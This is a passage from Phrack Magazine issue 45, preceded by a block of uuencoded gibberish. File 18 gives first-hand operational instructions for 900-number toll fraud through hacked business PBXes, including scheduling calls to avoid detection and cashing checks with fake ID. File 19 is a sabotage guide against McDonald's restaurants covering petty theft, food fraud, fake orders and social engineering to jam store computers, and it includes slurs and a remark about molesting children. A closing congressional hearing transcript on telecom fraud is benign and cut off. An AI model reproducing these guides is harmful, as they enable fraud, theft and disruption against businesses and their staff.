M<\*#A7C/B2P!C;;7O;"PK\/(CXS_`))4?1@_XYYH5?$W",EFJ:%D#GNC>]\, MCBPN:==KE3Z<('73PQD+M7&MS(:$S(3WX__7XQ+24/TXRB-]F*N4(<834XPB M%<8:JD#)<9VIG^+&%R.-"KX^F,D$*NF,`(UWKBI`5<:QN8(Q<-)<@\<"K705 M=QN$-'0T\M54RG;'%"PN>\^@&.DN079HF_L;B#F''L`(=#:`LI MP&/C<,B`\$%R?1A!VNS\@*J<3SWF_4K.M.8FE/8Y#@Q=1=FZF#TGOM46`H'/ M0/\`H;@+>G<@6<)U=5;[;=9*T';%&:LAP)ZE00@]F&@J)(Q-)\+O$3G*&2%< MO7QP'Q M=,1US**2HB;;14.!8-PFV[B_JFWIB!K-24.-[O&0S,'3%FLW(%Q;NLS[-<8V M@(NN,]V-0/;Z8J6!2N1.,L8!F,9:T8JY@7%B`BR4;AE[\? M_]#CAC02`7!H(U/LQNT$(,5>S14QC8",L5+"FN?AC#8T;HF>+=V4\!Z8PZ-" MO3&!'H@Q>6)'.:"J?E#KBO=J,5[L^&#NKX'[=<*M637,K14P'GDC!3>? M0G)OCA]^5?95K+I2TU=Q9=#1=XQKW45(P&1BYHY[L@4\`<="6O!_`-*8N M'K?'!+L22JD\\\GM><_<$&#FMN"1%C2&L5'N<>F"'F`^[5_!MSI.&)@ROF@< MV"8Z-\DRQC>'GJ5"_7A;)JZY3Q,<^3NI&-;EJB-_7AB^ M9/[HNO\`*W@V"NAH&D@?'2-PYZCP MQ5S"'EI(RQ@M77%MOE]1C+(\E\<9,3E3(>"XD9"0C2-<9$;03N(SQ4!HZ;O; MBP?H&A/4XH\%[E.-#"`=I0XUC-H"XRFYR#^6+M8"$U.,AAU&+M;D6IGTQCN_ M*AUQH9TQEL6>?08T1H0-1C0P;O#%96(5],9:S(?KQC8?#0]<7B82^,`*2X`` M>W'_T6,FU_R<`ZG^NC^YP67;^M8+G?UKW#`*?^M'WX`RZ#WXPW^M^[</L. M*-^T[V8R_0XJ[0>S$U)^7AT^+/\`R8_+G_G$MG_,0QV[;?L2^W`:_P#^!S_W M+\)"H_Y#5?L&+TO_`"!/_&F_BQSKQ7_R3N?_`!YWX\!>(_\`H2![3^/#957V MY,%%;_7&^T8@G^WC6?8.,.Z?W)Q)1_:/MQ,[5OL.+5&@]F-I?LG`B?1OL&*U M']:;[#@#U;BT'VCBSOM8Q/\`:?[\1]?=C`T^G`V'^M,]^)&ZGV8V;^M'VG`' MJ?[H8M_?/><9Z^[$[/ZZSV8Q-_7!BU/I)BQZ8I)U]V,0_9=C%-]L^W%:?_#8 'O^.-_'C_V7C_ ` end ==Phrack Magazine== Volume Five, Issue Forty-Five, File 18 of 28 **************************************************************************** [** NOTE: The following file is presented for informational and entertainment purposes only. Phrack Magazine takes NO responsibility for anyone who attempts the actions described within. **] **************************************************************************** **************************************************************** * * * FRAUDULENT APPLICATION OF '900' SERVICES * * * * by CO/der DEC/oder, of Dark Side Research * * * * Greetings to Minor Threat, The Conflict and Tristan * * and dedicated to the English Prankster, Phiber Optik, * * Louis Cypher and other hackers who have proved an honor * * to themselves and to our community in not cooperating * * with "law enforcement." * * * **************************************************************** The information presented forthwith is the result of knowledge gained through actual first-hand experience. There is no theoretical aspect to any part of this article, except where explicitly noted. Disclaimer: this file is for outright illegal use. I sincerely hope publication of this file contributes to the delinquency of both minors and adults alike. -- "Codec" Getting Started In setting up your own 900 number, you earn a big percentage of the net revenue generated by calls made to that number. You can advertise and promote your number in various and sundry ways in an extremely competitive environment, or--if you so happen to be a hacker--you can simply dial up some PBXes and call the number yourself. Since you'll be earning several dollars per minute, you won't be in any hurry to hang up. In fact, you may find yourself letting the phone stay off the hook while you chat on IRC or read the latest Phrack. Though not a scheme to get rich, this can provide a considerable income or simply an occasional bonus, depending on your h/p resourcefulness and effort exerted. Before you can start calling your own 900 number and making yourself money, you need to buy into the 900 business. On your next outing for the latest copy of Hustler, grab a USA Today. In the classifieds, (as well as many other business classifieds), under the heading "business opportunities," you'll notice any number of 900 ads. You want to find a "service bureau" and not a simple "reseller," so shop around and call a number of the companies, asking about percentages and whether or not your setup costs (usually ranging from $300 to $1500) are comprehensive for the year or whether you'll have to pay a monthly fee. Avoid these pesky monthly maintenance fees. All sorts of 900 packages exist, but you want an automated service--such as a dateline--that is ready to all as soon as you've paid. This means you'll have no equipment to set up, or 900 trunks terminating at your house, or hookers to hire, etc. The service bureau provides you with the number and the service, so all you have to do is market the number (should you be legit). You can bargain a little on the setup fee. An example of a worthwhile deal would be as follows: an automated dateline number (similar to a voice ail system, only you listen to personal ads and have the option of leaving a response) for $750/year, a per minute rate of $3.99, and a 75% net return (i.e., you make about $3.00/min). AT&T and MCI provide 900 services to the service bureaus. AT&T is preferable, as you receive payment two months after the end of the calling month, as opposed to three months with MCI--so ask about this too. Your continued efforts will reap a monthly check thereafter. The service bureau actually sends you the check. You'll want it in a personal name to make it easier to cash with your bogus ID. Some bureaus will "factor" your account, meaning that if you've accumulated a lot of credits, they will pay you in advance of their getting paid by the carrier--for a percentage fee. Don't try to scam them on this; your account is scrutinized closely before a premature check is approved. If everything is done properly, both you and the service bureau will be happy. [That's what's so great about this project: everyone wins--you, the service bureau, even AT&T--only the PBX owner loses!] You will be able to check your credits, or "minutes" as called in the 900 industry, by calling a special number provided by the service bureau. After entering your account codes, an automated response will give you statistics such as daily call reports and total minutes accumulated for the billing month. Be sure to find out about the virtual end-of-month date. The end of each billing period is not necessarily the last day of the month. Accordingly, you will need to plan your attacks with this in mind, as we will discuss next. Getting A Date Now that you've set up your dateline, you'll be anxious to start earning the three bucks a minute. The dateline makes it kind of fun, since you get to hear all kinds of ridiculous messages and the typical horny soliloquy. Get a speakerphone if you lack one now. You don't necessarily need PBXes--any outdials you find that complete a 900 call will suffice. However, the lines targeted must be those of a business, one that is large enough to own a PBX. Calling on residential lines, cell phones, or from small businesses will not work--the owners will get their bill, and simply call the phone company and complain that they didn't make the call. This will attract undesired attention to your line by the LEC and your service bureau, and it will also cost you in that the carrier connect fees, about .25 and .30 per minute, will be deducted from your account. The LD carriers get theirs, whether the party pays or not. This is why the calling method encouraged here is the PBX. If you can manipulate central office switches, do so by these same principles. PBX owners tend to pay their phone bills--including 900 calls that aren't outrageous. They'll assume that one of their own employees made the call, if they even notice. Instead of attempting to exploit a PBX to some astronomical degree, you're better off running up a mere fifty to sixty dollar charge. Do this every month as part of a schedule. Not only may it go unnoticed, but you are assured that it will go uncontested even if detected. Running up an excessive number of minutes risks unneeded attention and assures either a total "killing" of the PBX, or at minimum, 900 restrictions added by the PBX administrator. Even with a remote admin access, your luck will run out. Remember: YOU WILL ONLY GET PAID IF THE PBX OWNER PAYS THE PHONE BILL! With this in mind, the most limiting factor is the number of PBXes you can accumulate. The widespread raping of AT&T's System 75/85/Definity in 1992 (as a result of discoveries in 1991) made that year extremely ripe for this 900 scheme. Many of us managed to accumulate large collections of System 75s, including the elusive Super Nigger, who allegedly compiled over 300. (Where the hell were you hiding?) AT&T security memorandums have since killed hundreds of these, but the defaults still work well in some cities. Regardless, PBXes abound, and the more you find, the more minutes you can generate. Let's look at a sample attack schedule: PBX # M T W Th F S Su 01 15m 02 10m 03 8m 04 14m 05 16m 06 24m 07 12m 08 13m 09 16m 10 2m,10m 11 13m 12 4m,4m Twelve PBXes are to be attacked in the sample week, so there are probably fifty PBXes totally to be attacked for the month. Each PBX is to be used only once per billing period. You will get many months of use out of each PBX with this conservative approach, so long as every hacker west of Poland doesn't have access as well. Notice how the number of connection minutes varies, and the calling pattern is quite random looking. The schedule is maintained not only to keep track of PBXes in your harem you've fucked for the month, but to assist you in generating minutes in a pseudo-random pattern. It is acceptable to have your minutes generated in a pattern, albeit a loose one. For instance, if all minutes are generated only on the weekend, a discerning eye will not attribute this to the type of marketing you are using. The sample schedule is only the ideal model. Having to rigid a pattern, however, such as having an exact number of calls each day, is potentially suspicious to your service bureau. Simultaneous calls to your 900 number through different outgoing trunks on the same PBX is also strongly discouraged. Listening Software Calling your 900 dateline number is fun, but when you've got over a hundred PBXes to hit each month for an average of fifteen minutes a pop, the novelty tends to wear off. Of course you can have a speakerphone and a time and go about other tasks between calls, but why not write a program that will enable your modem to do all this for you? All the program must do is have the modem call a PBX from a list, pause, and call your 900 (or another PBX and then your 900, for LD PBX attacks). Once connected to your 900, it must stay "listening" until a random timer (10-20 minutes) hangs it up. Depending upon your dateline service, the modem may have to emit a DTMF every once in a while to keep the service convinced you're still there. This is a very worthwhile program to write--it can drastically reduce your total time spent with this operation, leaving you with only the PBX list to maintain (additions and deletions), and the spending of your hard-earned cash (the novelty of this WON'T wear off). Large Charge-Rate Option A 900 number can be set up to charge as much as $50 per call. Whether the call lasts less then a minute, or for over ten, the cost for the caller is the same $50. In order to set up such an account, you must qualify as an "Information Provider," or IP. Regulations on 900 numbers state that you must be a provider of information, not tangible goods. With a dateline, the information is included in your deal with the service bureau, so you are considered an IP. The bureau can provide you with your own number that terminates in a voice processing or audio-text system, but now you must provide the actual information. Your idea must be approved by the LD carrier, and they tend to scrutinize your plans the higher your desired rate. Your bureau may even subject your service to a test to make sure it's not a fake. One idea is to ask for a $25 per-call rate. Make like a writer of shareware programs, and have your 900's announcement ask the caller to leave name and address to be legally registered to use the software, and to receive updated versions. A confirmation notice will be sent to acknowledge the registration. Many bureaus will accept this as qualification for IP status, if properly presented. A sample arrangement like this should not cost more than a grand to set up. Stats on minutes are checked just as with the dateline, only you'll receive any messages left by callers, and you'll receive any messages left by callers, and you'll be able to change the announcements--just like voice mail. [IT's always a thrill to call a 900 number and hear yourself thanking the caller, heh heh.] On a $25 line, you should net about $19 per call. All the same rules apply using this large charge-rate setup. You can't abuse a PBX any more with this option then with a dateline. It does give you the added flexibility for methods used other than PBXes, such as outdials that will only connect briefly. For instance, message notification on voicemail will not connect to a number for prolonged durations, but long enough to activate a $25 charge. And a typical modem outdial on a mainframe will soon hang up with the absence of an answering carrier, but the linger is long enough for a $25 call. And with CO switching, the arrangements you make are ideally temporary--turned quickly on and off--making a fast $25 hit optimal. Lastly, if you are skilled in accessing corporate phone closets (see "Physical Access and Theft," Phrack 43) or the corresponding outside plant, you can use your test set to call your 900. Obviously a large charge-rate would be better here too, rather than standing for endless periods of time in compromising positions connected to a squawking dateline. No matter how you access business lines, be sure they belong to a large company. Definitely experiment, but do so in moderation--make any necessary notes (like time and date of call) and wait for your 900 billing statement to see if the call was paid for. [Your billing statement, essentially a call accounting summary, is created for each billing month by the LD carrier and sent to you via the service bureau with your check. It includes the calling phone numbers, time, date, duration, etc. of all calls made to your number.] A Final Word It would be hard to get "busted" doing anything mentioned in this article. Even if you're nabbed for misdemeanor PBX abuse, no one will ever imagine--let alone try to prove--that the 900 number you were calling is your own. [Hey, you're just a desperately lonely guy!] However, be wary of pen registers (DNRs) if you've been up to other dark deeds, and set up your calling operations at a safer place. Don't check your minutes using any of the same means that you use to generate them (a record of your calling into your 900 backdoor is probably the most incriminating track you can make). Keep your 900 account anonymous, as with your address, voice mail, and ID/SSN. Welcome to the dark side--and best of luck. Sincerely, CO/der DEC/oder DSR [ The Author can be reached, when the system is up, at: codec@crimelab.com ] ==Phrack Magazine== Volume Five, Issue Forty-Five, File 19 of 28 **************************************************************************** [** NOTE: The following file is presented for informational and entertainment purposes only. Phrack Magazine takes NO responsibility for anyone who attempts the actions described within. **] **************************************************************************** Screwing over your local McDonald's - Charlie X - INTRODUCTION Ok... everyone is familiar with the world's largest and fastest growing fast food chain, McDonald's. The founder, Ray "Crock", wanted an environment where families and friends could get food with friendly service at any time of the day... Boy, what a crock, at least now. To top everything off, McDonald's attacks decent food establishments by criticizing the food content... not like you'll find anything not genetically engineered in McDonald's food... Everyone must realize that McDonald's sucks, and you must do your part to put the fucking place out of commission... As far as I can tell, everyone in McDonald's is rude and has an attitude, from the management to the customer. They, as most restaurants do, firmly believe THE CUSTOMER IS ALWAYS RIGHT. This is true even when the customer is an asshole with blind disregard for everyone and everything. This is where you come in... Here are a few things that you can do to put your local McDonald's in it's place... Recently in the news, a major group sited McDonald's as the most environmentally responsible establishment on the planet (note: this is even over green peace and Sally Struthers)... how the hell is this possible? SENIOR CITIZENS BENEFIT DAY/WEEK McDonald's is nice to senior citizens. Every McDonald's offers free or reduced price meals or drinks to Senior citizens... Now, all you have to do is attract them. For a minimal price, you can publish an ad in the local newspaper, or publish your own flier (can be cheaply made) which explains that a certain day/week, your local McDonald's will recognize senior citizens with free food, coffee, senior activities, you know... a big senior social. You may want to mention that other organizations will be there to speak and make the whole "event" decent... Now, if your McDonald's already offers free/reduced coffee, food, or sodas, this will definitely break them, and cause them to order much more supply, and could even cause them to run out of coffee or soda for the rest of the day... on the other hand, if they don't offer this, the mass crowd of old people asking for shit will certainly piss someone off... This has been tested, and as a result, a McDonald's had to close for a day to reorganize and reorder supplies, as well as "launch an investigation" about this Day, but they never turned up anything. GARBAGE CAN TRICKS Since McDonald's is usually a busy restaurant, the trash bags fill up quickly and must be changed frequently (but never are.) There are several things you can do to the trash cans. For starters, ask for hot or boiling water. If you don't want to attract attention by doing this, bring in your own really hot water... boil it, put it in a Styrofoam cup or a thermos... once in McDonald's, locate the filled trash can (should not be hard to find) and dump the hot water down the side. Not only will this melt the side of the bag, causing the trash to go everywhere, the person who takes out the garbage must pick up all the trash by hand and dump out the trash can with water in the bottom. This also soaks the trash, breaks up paper, and makes the whole experience quite unpleasant, but hilarious to watch. Another easy trick is to walk up to the trash can areas, take the trays sitting above the trash cans, and simply throw them in all the cans. This will either make the employee fish them out by hand, or will cause the restaurant to be short of several trays, which becomes quite annoying. FOOD TRICKS There are several things to do with the food. Since there is probably something wrong with it in the first place, you might want to simply make the problem bigger... Before you enter the restaurant, cut some of your hair, or hair off of a pet. When at your table, place the hair all over the inside of the burger. When the line at the counter is long, and everyone is busy, cut up to the front of the counter, and start complaining about your burger. Show EVERYONE the hair inside the burger. You will get another burger, and most likely, a lot of free shit so you will come back. You will also cause most everyone to leave, and people in the kitchen to get shit on by the manager. ON A BUSY DAY... Busy days are the best. Customers are in a hurry, so are the employees... everyone has a short fuse and usually do not pay attention to what you say, or get very pissed. Ask for real dumb shit... For example, "I'd like a 69 piece Chicken McNugget." The best thing to do is to order a simple cheeseburger, and screw it all up with special orders... For example, "I'd like a cheeseburger, with extra cheese, no mustard, extra catsup, extra onions, lettuce, tomato, a real little dab of mayo, and make it well done... oh wait, I don't want cheese anymore. Just put extra lettuce on it... [wait for them to send the order back to the kitchen]... then Oh, wait, sorry... I just want a BigMac." You can also say, "I'd like a medium Coke with just 4 pieces of ice in it." They will always do what you say... Keep in mind that special orders do not cost extra, so you can order a hamburger, ask for extra mustard, catsup, and somewhere in there, casually mention extra cheese... 9 times out of 10 this works... and you don't get charged. NOTE: if you hear a printer printing followed by 3 beeps somewhere in the kitchen, your grill order was printed, and will be made... so change it after you hear that. In some McDonald's, you will find the "Need A Penny - Take a Penny," Where people put in their loose change in case someone else is short some money... steal ALL the money in this. In one month, I made $42.71 from stealing the money from all the Need A Penny cups in my area... This is a good secondary income for lazy people. If you plan on a big order, start off by telling the person you just want a soda. After they give a total and get ready to take your money, add an item. Keep saying "That's it" and repeat this process until you have what you wanted, and have wasted several minutes. You can also have the cashier repeat your order as many times as you wish, also wasting time. THE INQUIRING CUSTOMER McDonald's managers pride themselves in knowing the answers, and employees like to pretend that they do. So, on a busy day, keep asking dumb questions... Here are a few to ask... Oh, never actually order anything... just hold up the line with your questions. Here are a few questions to ask: - "How is your meat prepared at the factory?" - "What part of the chicken does the McNugget come from?" - "Who was the BigMac named after?" - "What is the post-cooked weight of your quarter pounder?" - "Where does your come from?" - "How fresh is your ?" - "What is the square root of 69.666?" - "What is the nutritional value of a 9 piece McNugget box?" DRIVE-THRU FUN McDonald's videos tell the employees that the Drive Thru makes up for more than 40% of the average McDonald's business. Simply put, this system needs a lot of work. The speakers rarely work, and you usually get your order screwed up. The first thing to do is to take your car and back over the cut square in the pavement right beside the order sign several times. This causes a loud annoying "bong" to be heard by everyone with a headset... eventually the manager will come out with a weapon, and this is where you leave. Another thing to do is to drive up, and say, "I just want a lot of butter..." or "I'd like a large penis to go please." Usually, people in the drive thru service will laugh or screw something up, and you will get yelled at by the manager... waaah. If you want free food, order something in the drive thru. Keep your window down to listen to other orders. After you receive your food, park and enter the restaurant. Go to the front of the line and tell the person on duty that your order was screwed up... it helps to remember what someone else's order was, and then you just ask for that... you will get it. Sometimes, you even get free food for having a screwed up order. This prank requires guts, but can be somewhat amusing. Simply drive up in front of the sign, turn your engine off, and go inside the restaurant and eat. There's always room to park in the drive-thru lane... You could also tell the drive-thru person that your car stalled, and you will have to call the motor club. This can put a drive-thru out of commission until you decide to move your car. If you happen across a McDonald's that is expecting deliveries, or has cleaned the parking lot, you will notice traffic cones. You can move these cones around the drive-thru sign. Some people are stupid and will drive thru them anyway, so you may want to place a sign saying "DRIVE THRU CLOSED - - SORRY - MANAGEMENT." You can also place a legitimate order at the drive thru and right after your order, you can put a sign on the drive-thru sign saying the same "closed" message. The drive thru sensor does not sense foot traffic, so you can walk up to the sign and put one there... The drive thru headsets can be a good source of amusement. When ordering, mumble your order, scream it real loud, or say it like the microphone is cutting out, for example, "I'd like to order a LARGE ibbit-obbt-ibbit-urger with no Sa... and extra and I'd also like a Med Oke." When they ask you to repeat, do the exact same thing. Remember, that as soon as you drive up to the sign, they can hear everything in your car... even if they are not talking. As soon as they ask for your order, turn your stereo up real loud, and begin to say your order... this screws everything up... Also, ask for a hotdog, or an item that you know they don't have. If you have the guts, are really bored, and are not driving YOUR car, take them seriously when they say "please drive through." This would be the ultimate action, putting your local McDonald's out of business. If you have a simple shortwave transceiver, Ham Radio, or powerful handheld transceiver, you can talk to the entire drive-thru crew. The antenna is located above the cashier in the drive-thru box and has a receiving radius of the entire store and about half of the parking lot. You can add stuff to peoples orders, or just screw around. Drive thru people have noticed that illegally powerful CB radios, side band radios and even some car phones can be picked up with the headsets. Be innovative and use these to piss the employees off. If you do not have access to one, simply hide behind the sign, and shout extra food or obscenities at the sign... GREASE DISPOSAL FUN This next trick involves little or no intelligence, or imagination, but seems to get people every time. Behind McDonald's, usually found next to trash cans or the empty soda-syrup containers, you will find a large drum marked "not-fit for human consumption" or "inedible contents." Although these warnings belong in the food, they mark the grease vat. This is tightly sealed for a reason... it smells like dead human. They are also easy to open. Usually, you can loosen the ring around the top and open the lid. Be sure to cover your face when you do this... it does smell like shit... The nice thing about this is that the smell will cover the entire parking-lot area in roughly 10 minutes. Chemically, the smell will cause nausea, and definitely a loss in appetite. People will get sick everywhere, and definitely cause a loss of customers at McDonald's... A simple addition to the previous trick would be to tip the can. The grease will probably have hardened, but on a warm day or if the black can is left in the sun, it will leave a sticky, raunchy mess in the parking lot that will be impossible to clean up, and will stink infinitely. This is a way to make the trick more damaging and longer lasting. DUMPSTER FUN McDonald's, or any fast food restaurant usually has a high volume of garbage output (not including the food). If you can travel around and find large objects, you can dispose of them in the trash containers. If you clog them up, not only will the store have to pay for an extra collection of trash (to remove what you put in there), They'll have to pay extra for later (or earlier) you do it, as well as what kind of objects you put in there. You can also put the empty silver soda containers, bread racks, or even signs and loose McDonald's shit in the trash. They won't appreciate the loss, and it's gonna cost them money at both ends. Lame but definitely effective. PHONE ORDER PHUN One thing that is not very well known is that McDonald's accepts phone orders. This is a simple process. A serious, adult sounding voice can call a local McDonald's and claim that they have a large order that they would like ready for pickup. You supply a BS phone number, a BS name, and a BS order. The larger it is the better. Usually give about a half an hour to an hour notice to have the order ready. Good reasons for the orders are usually family get- togethers, meetings at local universities, etc. The university excuses are much better, because you can supply a college phone number (found in the phone book) and if they call (the usually don't) to verify the order, they will get the office, and will think it's legitimate. This prank is a beauty because after the manager takes the order, it is given directly to the kitchen, who begins the order. Again, they very rarely verify the orders, so it is easy to pull these off. To make this prank better, you should throw in mass quantities of food items that people NEVER eat -- Filet O' "Fish", Fajitas, etc... You can also call them back at the time of pickup, and say "sorry, we decided to eat at burger king..." DO NOT enter the restaurant and ask to buy the items at a cheaper price, like the old pizza man trick... that's just lame. COMPUTER PHUN A nice thing about McDonald's is that it is linked via computer (and modem) to OakBrook, Illinois. Check your local phone book for a McDonald's with 2 lines. The second line is usually the computer line. You may also try Information. If you aren't able to get the number, read these next 3 parts... - McDonald's are listed by Restaurant number in the phonebook. You can retrieve the number, then call the restaurant, asking for the manager. When the manager identifies himself, with his name, you write the name down, and tell him to get bent or something. With that information, you can call McDonald's 800 number, or any McDonald's Corporation HQ number in OakBrook, Illinois (they will relay your call). You say you haven't been receiving updates or any purchase orders, you identify yourself, and your store number, and location (city, state...). They will check the listings, and read off the phone number of the computer. If they won't give it to you, they will allow you to change the computer number, where you give them your enemies phone number or something, and they will get called by modem repeatedly... - Call your local McDonald's, identify yourself as Bill Haggan of Computer Services, McDonald's, Oakbrook... etc. Say you are updating your records, and need the computer telephone number. Get the number, then give them a bullshit verification number. - This is not very imaginative, but it works... it's also risky... wooooo. Find the phone box, open the user service box, connect any phone with an RJ-11 adaptor to the box and type your local ANI number (211, 811-9967) etc... do that for each line that enters the restaurant. Then reconnect it... you have the numbers. Now that you have the numbers, there is a lot you can do. It is not wise to enter the computer. Although goodies are buried there, any changes you make are corrected that night with a verification call. It is also verified voice. However, everything in the restaurant is connected to the computer. Once you call the number, and connect to the computer, just sit there. The computer freezes all time clocks, order programs, etc. Every display will be marked "BUSY." This prevents anyone from punching in or out, the manager from checking labor, printing schedules, do inquiries about anything... basically interrupt most managerial and owner duties. If you find a constant busy signal, this is very easy to correct. Simply ask for an operator interrupt. If the operator breaks in, the beep will hang up the modem, allowing you to call right in. This prank does have profound effects on the McDonald's. It is highly recommended. FREE SHIT AT McDonald's Yes, I do mean shit... If you are involved in that fucking money crunch like everyone else, and you feel that your money should be spent on better things, rather than shitty food, here are a few pointers for free food. These have all been tested. If you are caught in the act of getting free food, nothing will happen, and it will be a big source of amusement... Cheeseburger - On a busy drive-thru day, you can ask for a special order. Ask for a hamburger with an extra item, like mustard or something, and casually sneak in "extra cheese." If the employees are stupid enough (a given), and the grill doesn't question it, you will find yourself with a nice fresh cheeseburger for the price of a hamburger... whoopee... Any Item - The BEST thing to do is order something in the drivethru, and then come in the restaurant with the bag from drive thru and say "You forgot ..." If you ask the employees at the counter, 9 times out of 10, you will get it... To be on the safe side, you may want to go home, call the McDonald's, say you went through the drive thru and you didn't get your food item. You can give a bullshit name or whatever, usually they don't even take the name, and the next time you go in, you say you called, and you will get gift certificates or free food... works every time. BASTARDIZING FOOD ITEMS If you want to attract a certain degree of attention to yourself, and make employees and customers laugh, when you order food, fuck up the names to say something cool... You'll still get the food you don't want, and this too is a source of amusement. Spur-of-the-moment name bastardizations are by far the funniest, but here are a few suggestions... SHMEGMA MAC, SHMEGMA SACK - instead of Mega Mac (shmegma is Dick Cheese) CHICKEN McFUCKUPS - Chicken McNuggets (be sure to ask for the 69 piece) McDICKEN - McChicken (ask for extra Mayo and smile...) CHOKE - Coke (I'd like a small choke with no ice) McRIBBED FOR HER PLEASURE - McRib... Do they still make this? FAGINA - Fajita (I'd like a FAGINA with extra cheese...) IMPORTANT Remember that McDonald's slogan is Food, Folks, and Fun... Just take the "fun" part to the limit... You sort of have to compensate for the asshole "folks" and the shit "food." If you get bored, start molesting kids on the playland or just break shit... throwing salt shakers (plastic or glass) at the outside wall of the McDonald's is fun too... take advantage of whatever there is in McDonald's... there are infinite possibilities to create your local McDonald's an utter McHell. Don't consider it illegal (most of it isn't...) consider it more of a public service. Yeah... That's it. ==Phrack Magazine== Volume Five, Issue Forty-Five, File 20 of 28 **************************************************************************** The Senator Markey Hearing Transcripts [To obtain your own copy of this hearing and the other related ones, contact the U.S. Government Printing Office (202-512-0000) and ask for Serial No. 103-53, known as "Hearings Before The Subcommittee on Telecommunications and Finance of the Committee on Energy and Commerce, House of Representatives, One Hundred Third Congress, First Session, April 29 and June 9, 1993".] ---------------------------------------------------------------------- Mr. MARKEY. If you could close the door, please, we could move on to this very important panel. It consists of Mr. Donald Delaney, who is a senior investigator for the New York State Police. Mr. Delaney has instructed telecommunications fraud at the Federal Law Enforcement Training Center and has published chapters on computer crime and telecommunications fraud. Dr. Peter Tippett is an expert in computer viruses and is the director of security products for Symantec Corporation in California. Mr. John J. Haugh is chairman of Telecommunications Advisors Incorporated, a telecommunications consulting firm in Portland, Oreg., specializing in network security issues. Dr. Haugh is the editor and principal author of two volumes entitled "Toll Fraud" and "Telabuse" in a newsletter entitled "Telecom and Network Security Review." Mr. Emmanuel Goldstein is the editor-in-chief of "2600: The Hacker Quarterly." Mr. Goldstein also hosts a weekly radio program in New York called "Off The Hook." Mr. Michael Guidry is chairman and founder of the Guidry Group, a security consulting firm specializing in telecommunications issues. The Guidry Group works extensively with the cellular industry in its fight against cellular fraud. We will begin with you, Mr. Delaney, if we could. You each have 5 minutes. We will be monitoring that. Please try to abide by the limitation. Whenever you are ready, please begin. STATEMENTS OF DONALD P. DELANEY, SENIOR INVESTIGATOR, NEW YORK STATE POLICE; JOHN J. HAUGH, CHAIRMAN, TELECOMMUNICATIONS ADVISORS; EMMANUEL GOLDSTEIN, PUBLISHER, 2600 MAGAZINE; PETER S. TIPPETT, DIRECTOR, SECURITY AND ENTERPRISE PRODUCTS, SYMANTEC CORP.; AND MICHAEL A. GUIDRY, CHIEF EXECUTIVE OFFICER, THE GUIDRY GROUP Mr. DELANEY. Thank you, Mr. Chairman, for the invitation to testify today. As a senior investigator with the New York State Police, I have spent more than 3 years investigating computer crime and telecommunications fraud. I have executed more than 30 search warrants and arrested more than 30 individuals responsible for the entire spectrum of crime in this area. I authored two chapters in the "Civil and Criminal Investigating Handbook" published by McGraw Hill entitled "Investigating Computer Crime and Investigating Telecommunications Fraud." Periodically I teach a 4-hour block instruction on telecommunications fraud at the Federal Law Enforcement Training Center in Georgia. Although I have arrested some infamous teenagers, such as Phiber Optic, ZOD, and Kong, in some cases the investigations were actually conducted by the United States Secret Service. Because Federal law designates a juvenile as one less than 18 years of age and the Federal system has no means of prosecuting a juvenile, malicious hackers, predominately between 13 and 17 years of age, are either left unprosecuted or turned over to local law enforcement. In some cases, local law enforcement were either untrained or unwilling to investigate the high-tech crime. In examining telecommunications security, one first realizes that all telecommunications is controlled by computers. Computer criminals abuse these systems not only for free service but for a variety of crimes ranging from harassment to grand larceny and illegal wiretapping. Corporate and Government espionage rely on the user-friendly networks which connect universities, military institutions, Government offices, corporate research and development computers. Information theft is common from those companies which hold our credit histories. Their lack of security endanger each of us, but they are not held accountable. One activity which has had a financial impact on everyone present is the proliferation of call sell operations. Using a variety of methods, such as rechipped cellular telephones, compromised PBX remote access units, or a combination of cellular phone and international conference lines, the entrepreneur deprives the telephone companies of hundreds of millions of dollars each year. These losses are passed on to each of us as higher rates. The horrible PBX problem exists because a few dozen finger hackers crack the codes and disseminate them to those who control the pay phones. The major long distance carriers each have the ability to monitor their 800 service lines for sudden peaks in use. A concerted effort should be made by the long distance carriers to identify the finger hackers, have the local telephone companies monitor the necessary dialed number recorders, and provide local law enforcement with timely affidavits. Those we have arrested for finger hacking the PBX's have not gone back into this type of activity or crime. The New York State Police have four newly trained investigators assigned to investigate telecommunications fraud in New York City alone. One new program sponsored by AT&T is responsible for having trained police officers from over 75 departments about this growing blight in New York State alone. Publications, such as "2600," which teach subscribers how to commit telecommunications crime are protected by the First Amendment, but disseminating pornography to minors is illegal. In that many of the phone freaks are juveniles, I believe legislation banning the dissemination to juveniles of manuals on how to commit crime would be appropriate. From a law enforcement perspective, I applaud the proposed Clipper chip encryption standard which affords individuals protection of privacy yet enables law enforcement to conduct necessary court-ordered wiretaps, and with respect to what was being said in the previous conversation, last year there were over 900 court-ordered wiretaps in the United States responsible for the seizure of tons of illicit drugs coming into this country, solving homicides, rapes, kidnappings. If we went to an encryption standard without the ability for law enforcement to do something about it, we would have havoc in the United States -- my personal opinion. In New York State an individual becomes an adult at 16 years old and can be prosecuted as such, but if a crime being investigated is a Federal violation he must be 18 years of age to be prosecuted. Even in New York State juveniles can be adjudicated and given relevant punishment, such as community service. I believe that funding law enforcement education programs regarding high-tech crime investigations, as exists at the Federal Law Enforcement Training Center's Financial Frauds Institute, is one of the best tools our Government has to protect its people with regard to law enforcement. Thank you. Mr. WYDEN [presiding]. Thank you very much for a very helpful presentation. Let us go next to Mr. Haugh. We welcome you. It is a pleasure to have an Oregonian, particularly an Oregonian who has done so much in this field, with the subcommittee today. I also want to thank Chairman Markey and his excellent staff for all their efforts to make your attendance possible today. So, Mr. Haugh, we welcome you, and I know the chairman is going to be back here in just a moment. STATEMENT OF JOHN J. HAUGH Mr. HAUGH. Thank you, Mr. Wyden. We expended some 9,000 hours, 11 different people, researching the problem of toll fraud, penetrating telecommunications systems, and then stealing long distance, leading up to the publication of our two-volume reference work in mid-1992. We have since spent about 5,000 additional hours continuing to monitor the problem, and we come to the table with a unique perspective because we are vender, carrier, and user independent. In the prior panel, the distinguished gentleman from AT&T, for whom I have a lot of personal respect, made the comment that the public justifiably is confident that the national wire network is secure and that the problem is wireless. With all due respect, that is a laudable goal, but as far as what is going on today, just practical reality, that comment is simply incorrect, and if the public truly is confident that the wired network is secure, that confidence is grossly misplaced. We believe 35,000 users will become victimized by toll fraud this year, 1993. We believe the national problem totals somewhere between $4 and $5 billion. It is a very serious national problem. We commend the chairman and this committee for continuing to attempt to draw public attention and focus on the problem. The good news, as we see it, over the last 3 years is that the severity of losses has decreased. There is better monitoring, particularly on the part of the long distance carriers, there is more awareness on the part of users who are being more careful about monitoring and managing their own systems, as a result of which the severity of loss is decreasing. That is the good news. The bad news is that the frequency is greatly increasing, so while severity is decreasing, frequency is increasing, and I will give you some examples. In 1991 